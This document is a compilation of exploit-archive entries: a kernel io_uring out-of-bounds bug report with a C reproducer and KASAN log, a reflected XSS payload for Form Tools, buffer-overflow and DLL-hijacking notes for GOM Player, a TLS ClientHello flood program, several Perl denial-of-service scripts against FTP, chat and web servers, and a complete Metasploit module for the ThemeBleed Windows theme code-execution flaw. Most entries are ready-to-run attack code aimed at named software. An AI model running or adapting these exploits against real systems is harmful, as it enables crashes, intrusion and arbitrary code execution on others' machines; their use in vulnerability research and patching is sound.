<pre><code>io_uring: __io_uaddr_map() handles multi-page region dangerously<br /><br />__io_uaddr_map() wants to import a region from userspace, and then address the<br />imported region through the linear mapping area. This requires that the<br />imported region is physically contiguous.<br />A comment in __io_uaddr_map() explains that the imported region is usually<br />just a single page, in which case that is trivially fine.<br />However, __io_uaddr_map() also has code intended to permit multi-page regions,<br />in which case it tries to enforce that the entire region maps to the same<br />folio (in other words, the same head page):<br /><br /> /*<br /> * Should be a single page. If the ring is small enough that we can<br /> * use a normal page, that is fine. If we need multiple pages, then<br /> * userspace should use a huge page. That's the only way to guarantee<br /> * that we get contigious memory, outside of just being lucky or<br /> * (currently) having low memory fragmentation.<br /> */<br /> if (page_array[0] != page_array[ret - 1])<br /> goto err;<br /><br />This code is wrong for (more or less) two reasons:<br /><br />1. It only checks the first and last page; it doesn't check any of the pages<br /> in between. Userspace can easily create a set of adjacent VMAs such that<br /> the first and last virtual page map to the same physical page, while pages<br /> in between map to entirely unrelated pages.<br />2. It misunderstands how compound pages are represented in the kernel, and<br /> will always reject the case it is supposed to allow:<br /> `pin_user_pages_fast()` would return a set of adjacent `struct page`<br /> instances that are associated with the same head page / folio; it<br /> wouldn't return the same `struct page *` for every subpage.<br /> Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.<br /><br />So if this code is presented with a userspace region of the following shape,<br />containing individual 4K pages:<br /><br />[page A]<br />[page B]<br />[...]<br />[page A]<br /><br />then it will accept the region and assume that `page_to_virt(<page A>)`<br />returns the address of a page as big as the entire region. Accesses to the<br />first 4KiB of the region would work as intended; but accesses to later parts<br />of the region will be out-of-bounds accesses to unrelated pages.<br /><br /><br />Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it<br />overruns the end of the first sq page:<br /><br />```<br />#define _GNU_SOURCE<br />#include <unistd.h><br />#include <err.h><br />#include <stdio.h><br />#include <sys/mman.h><br />#include <sys/syscall.h><br />#include <linux/io_uring.h><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />#define NUM_SQ_PAGES 4<br /><br />int main(void) {<br /> int memfd_sq = SYSCHK(memfd_create(\"\", 0));<br /> int memfd_cq = SYSCHK(memfd_create(\"\", 0));<br /> SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));<br /> SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));<br /><br /> // sq<br /> void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));<br /> SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));<br /><br /> // cq (rings)<br /> void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));<br /> *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;<br /> for (int i=1; i<NUM_SQ_PAGES; i++)<br /> SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));<br /><br /> struct io_uring_params params = {<br /> .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,<br /> .sq_off = {<br /> .user_addr = (unsigned long)sq_data<br /> },<br /> .cq_off = {<br /> .user_addr = (unsigned long)cq_data<br /> }<br /> };<br /> int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));<br /> printf(\"uring_fd = %d\<br />\", uring_fd);<br /><br /> /* submit nops */<br /> int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));<br /> printf(\"enter returned %d\<br />\", enter_res);<br />}<br />```<br /><br />It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):<br /><br />```<br />[ 73.380288] ==================================================================<br />[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00<br />[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708<br />[ 73.383967] <br />[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357<br />[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />[ 73.386778] Call Trace:<br />[ 73.387177] <TASK><br />[ 73.387520] dump_stack_lvl+0x4a/0x80<br />[ 73.388117] print_report+0xcf/0x670<br />[...]<br />[ 73.389595] kasan_report+0xd8/0x110<br />[...]<br />[ 73.391954] io_submit_sqes+0x223/0xc00<br />[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200<br />[...]<br />[ 73.397438] do_syscall_64+0x46/0xf0<br />[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76<br />[ 73.398787] RIP: 0033:0x7ff8ed2e7989<br />[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48<br />[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa<br />[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989<br />[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005<br />[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100<br />[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0<br />[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000<br />[ 73.419272] </TASK><br />[removed irrelevant alloc/free traces of the accessed memory region]<br />[ 73.449202] <br />[ 73.449471] The buggy address belongs to the object at ffff88810263a000<br />[ 73.449471] which belongs to the cache kmalloc-128 of size 128<br />[ 73.451228] The buggy address is located 0 bytes inside of<br />[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)<br />[ 73.453173] <br />[ 73.453429] The buggy address belongs to the physical page:<br />[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a<br />[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0<br />[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)<br />[ 73.457522] page_type: 0xffffffff()<br />[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002<br />[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000<br />[ 73.460305] page dumped because: kasan: bad access detected<br />[ 73.461091] <br />[ 73.461353] Memory state around the buggy address:<br />[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />[ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br />[ 73.465289] ^<br />[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br />[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br />```<br /><br />I'm not sure about the best way to fix it - since the compound page support<br />can't actually have worked, as explained above, maybe it's easiest to just<br />drop support for compound pages? \u03bfr alternatively we could fix that, but since<br />nobody seems to have used it, that'd maybe be unnecessary complexity...<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-02-22.<br /><br />Related CVE Numbers: CVE-2023-6560.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: Form Tools Version: 3.1.1 - Reflected XSS <br /># Date: 2024-6-1<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://formtools.org/<br /># Version: 3.1.1<br /># Tested on: https://www.softaculous.com/demos/Form_Tools<br /><br /><br />1 ) Write after form_id your payload : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2<br /> Payload : "><sVg/onLy=1 onLoaD=confirm(1)//<br />2 ) You will bee alert button : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Gom Player 2.3.92.5362 - Buffer Overflow (PoC)<br /># Discovered by: Yehia Elghaly (Mrvar0x)<br /># Discovered Date: 04.01.2024<br /># Vendor Homepage: https://www.gomlab.com/en<br /># Tested Version: 2.3.92.5362<br /># Tested on: Windows 7, Windows 10<br /><br /># - Open GOM Player<br /># - Click on the settings<br /># - From the menu, select Audio --> Equalizer<br /># - Click on the plus sign to go to the "Add EQ preset" screen<br /># - Copy the contents of exploit.txt and paste it into name box, then click OK<br /># - Crashed!<br /><br /><br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 417<br /><br />try:<br /> file = open("exploit.txt","w")<br /> file.write(exploit)<br /> file.close()<br /><br /> print("POC is created")<br />except:<br /> print("POC is not created")<br /></code></pre>
<pre><code># Exploit Title: Gom Player 2.3.92.5362 - nvcuda.dll DLL Hijacking<br /># Date: 2023-01-03<br /># Exploit Author: Yehia Elghaly (Mrvar0x)<br /># Vendor Homepage: https://www.mrvar0x.com/<br /># Version: 2.3.92.5362<br /># Tested on: Windows 7, Windows 10<br /><br />A DLL hijacking vulnerability has been discovered Gom Player 2.3.92.5362. When a user loads the application it will try to load nvcuda.dll missing DLL from the same directory. Using a crafted DLL from MSFVENOM, it is possible to execute arbitrary code in the context of the current logged in user.<br /><br /><br />Gom Player 2.3.92.5362 can also load any malicious DLL with any given name from any directory wihtout proper checking the loaded DLL for example. Open Gom Player -- Settings -- Filter/Codec -- Render Filter -- Advanced rendering method -- Add- Browse -- Then loaded lol.dll which is generated by MSFVENOM and it will execute a reverse shell<br /></code></pre>
<pre><code>#include <stdio.h<br />#include <string.h><br />#include <unistd.h><br />#include <openssl/ssl.h><br />#include <openssl/err.h><br /><br />#define IP "127.0.0.1"<br />#define PORT 5061<br /><br />int main() {<br /> SSL_library_init();<br /> SSL_load_error_strings();<br /> OpenSSL_add_ssl_algorithms();<br /><br /> const SSL_METHOD *method = TLS_server_method();<br /> SSL_CTX *ctx = SSL_CTX_new(method);<br /><br /> if (!ctx) {<br /> fprintf(stderr, "Unable to create SSL context\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> SSL *ssl = SSL_new(ctx);<br /> if (!ssl) {<br /> fprintf(stderr, "Unable to create SSL\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> if (SSL_set_fd(ssl, fileno(stdin)) <= 0) {<br /> fprintf(stderr, "Unable to set SSL file descriptor\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> if (SSL_set_connect_state(ssl) <= 0) {<br /> fprintf(stderr, "Unable to set SSL connect state\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> const SSL_CIPHER *cipher = SSL_CIPHER_find("TLS_NULL_WITH_NULL_NULL");<br /> if (!cipher) {<br /> fprintf(stderr, "Unable to find cipher\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL");<br /><br /> if (SSL_connect(ssl) <= 0) {<br /> fprintf(stderr, "Unable to connect\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /><br /> printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl)));<br /><br /> // Send malicious ClientHello messages continuously<br /> while (1) {<br /> if (SSL_connect(ssl) <= 0) {<br /> fprintf(stderr, "Unable to connect\n");<br /> ERR_print_errors_fp(stderr);<br /> return 1;<br /> }<br /> sleep(1);<br /> }<br /><br /> SSL_shutdown(ssl);<br /> SSL_free(ssl);<br /> SSL_CTX_free(ctx);<br /> EVP_cleanup();<br /><br /> return 0;<br />}<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 07 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: File Sharing Wizard 1.5.0<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via method GET to web server.<br />#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $exploit = "\x41"x1360;<br /><br /> my $payload_header = "GET " . $exploit;<br /> $payload_header .= " HTTP/1.0\r\n\r\n";<br /><br /> my $connect = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br /> ) or die "Unable to connect to the victim: $!\n";<br /><br /> $connect->send($payload_header);<br /> close $connect;<br /><br /> print "[+] Done! Exploited!\n";<br /><br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "#################################################################\n";<br /> print "# File Sharing Wizard 1.5.0 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "#################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: httpdx 1.5.4 - Denied of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 06 january 2024<br /># Vendor Homepage: http://httpdx.sourceforge.net<br /># Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/<br /># Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: httpdx 1.5.4 - Denied of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denied of Service (DoS)<br /># Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The web server does not correctly handle the amount of data or bytes sent.<br />#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $sock = IO::Socket::INET->new("$ip:$port");<br /><br /> my $exploit = "\x41"x1040;<br /><br /> print $sock "POST /index2.html HTTP/1.0\r\n" . <br /> "Content-Length: 1023\r\n" . <br /> "Content-Type: html\r\n" . <br /> "Host: $ip" . "\r\n" .<br /> "\r\n" .<br /> $exploit;<br /> <br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /> ---------- # ------------------------------------------------------------------<br /> --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------<br /> -------- ##=== ----------------------------------------------------------------<br /> ------ ###==#=== --------------------------------------------------------------<br /> ---- ####===##==== ------------------------------------------------------------<br /> -- #####====###===== ----- Coded by Fernando Mengali -----<br /> - #####=====####===== ----- fernando.mengalli@gmail.com -----<br /> - #####=====####===== ---------------------------------------------------------<br /> --- ####= # #==== -------- Prepare to exploiting the server ------------<br /> --------- ##= -----------------------------------------------------------------<br /> ------- ####=== ---------------------------------------------------------------<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::SMB::Server::Share<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',<br /> 'Description' => %q{<br /> When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the<br /> msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll<br /> file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by<br /> opening the file for reading and verifying the signature before opening the file for execution.<br /> Because this action is performed in two discrete operations, it opens the procedure for a time of check to<br /> time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can<br /> serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name<br /> when the host intends to load/execute the dll.<br /> },<br /> 'DisclosureDate' => '2023-09-13',<br /> 'Author' => [<br /> 'gabe_k', # Discovery/PoC<br /> 'bwatters-r7', # msf exploit<br /> 'Spencer McIntyre' # msf exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-38146'],<br /> ['URL', 'https://exploits.forsale/themebleed/'],<br /> ['URL', 'https://github.com/gabe-k/themebleed/tree/main']<br /><br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_X64,<br /> 'Targets' => [<br /> [ 'Windows', {} ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],<br /> 'AKA' => ['ThemeBleed']<br /><br /> },<br /> 'DefaultOptions' => { 'DisablePayloadHandler' => false }<br /> )<br /> )<br /><br /> register_options([<br /> OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),<br /> OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),<br /> OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])<br /> ])<br /><br /> deregister_options(<br /> 'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity<br /> 'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity<br /> 'FOLDER_NAME'<br /> )<br /> end<br /><br /> def file_format_filename<br /> datastore['THEME_FILE_NAME']<br /> end<br /><br /> def setup<br /> super<br /><br /> @file = File.binread(datastore['STYLE_FILE'])<br /> begin<br /> pe = Rex::PeParsey::Pe.new_from_string(@file)<br /> rescue Rex::PeParsey::PeError => e<br /> fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")<br /> end<br /><br /> unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)<br /> fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')<br /> end<br /> @file_version_offset = pe.rva_to_file_offset(rva)<br /><br /> @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']<br /> @file_name << '.msstyles' unless @file_name.end_with?('.msstyles')<br /> end<br /><br /> def primer<br /> payload_dll = generate_payload_dll<br /> max_length = [payload_dll.length, @file.length].max<br /> # make sure that the lengths are the same by padding the smaller to the length of the larger<br /> @file.ljust(max_length, "\x00".b)<br /> payload_dll.ljust(max_length, "\x00".b)<br /><br /> virtual_disk = service.shares[@share]<br /> @service = service<br /><br /> virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)<br /> virtual_disk.add(virtual_file)<br /> # install this hook for create requests to set the thread-local file content<br /> virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|<br /> next unless request.name.read_now!.encode.ends_with?('_vrf.dll')<br /><br /> if request.desired_access.execute == 1<br /> virtual_file.tl_content = payload_dll<br /> else<br /> virtual_file.tl_content = @file<br /> end<br /><br /> nil<br /> end<br /><br /> file_create(make_theme)<br /> end<br /><br /> def get_file_contents(client:)<br /> print_status("Sending file to #{client.peerhost}")<br /> new_version = [999].pack('v')<br /> @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]<br /> end<br /><br /> def make_theme<br /> <<~THEME<br /> [Theme]<br /> DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060<br /><br /> [Control Panel\\Desktop]<br /> Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg<br /> TileWallpaper=0<br /> WallpaperStyle=10<br /><br /> [VisualStyles]<br /> Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}<br /> ColorStyle=NormalColor<br /> Size=NormalSize<br /><br /> [MasterThemeSelector]<br /> MTSM=RJSPBS<br /> THEME<br /> end<br /><br /> class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile<br /> def initialize(*args, **kwargs)<br /> super<br /> @default_content = @content<br /> @tl_content = {}<br /> @tl_content.compare_by_identity<br /> end<br /><br /> def open(mode = 'r', &block)<br /> @content = tl_content<br /> super<br /> end<br /><br /> def tl_content=(content)<br /> @tl_content[Thread.current] = content<br /> end<br /><br /> def tl_content<br /> @tl_content.fetch(Thread.current, @default_content)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br /><br /># Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 05 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view<br /># Notification vendor: No reported<br /># Tested Version:Easy Chat Server 3.1<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data via method GET to web server.<br />#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x90" x 16;<br /> $payload = "\x41"x568;<br /><br />my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n";<br />$buffer .= "User-Agent: Internet Explorer/4.0\r\n";<br />$buffer .= "Host: $ip:$port\r\n";<br />$buffer .= "Referer: http://$ip\r\n";<br />$buffer .= "Connection: Keep-Alive\r\n\r\n";<br /><br />print("[+] Exploiting...\n");<br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br />) or die "Could not connect! Error: $!\n";<br /><br />$socket->send($buffer);<br />close($socket);<br /><br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "#################################################################\n";<br /> print "# Easy Chat Server 3.1 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "#################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br /><br />use Net::FTP;<br /><br /># Exploit Title: Easy File Sharing FTP Server 2.0 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 04 january 2024<br /># Download to demo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: Easy File Sharing FTP Server 2.0<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server does not correctly handle the amount of data or bytes of the password entered by the user.<br />#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x2c";<br /> $payload .= "A"x2000;<br /> $payload .= "\x41"x610;<br /><br /> my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";<br /><br /> $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; <br /><br /> $ftp->quit;<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print "######################################################################\n";<br /> print "# Easy File Sharing FTP Server 2.0 - Denied of Service #\n";<br /> print "# #\n";<br /> print "# Coded by Fernando Mengali #\n";<br /> print "# #\n";<br /> print "# e-mail: fernando.mengalli\@gmail.com #\n";<br /> print "# #\n";<br /> print "######################################################################\n";<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /></code></pre>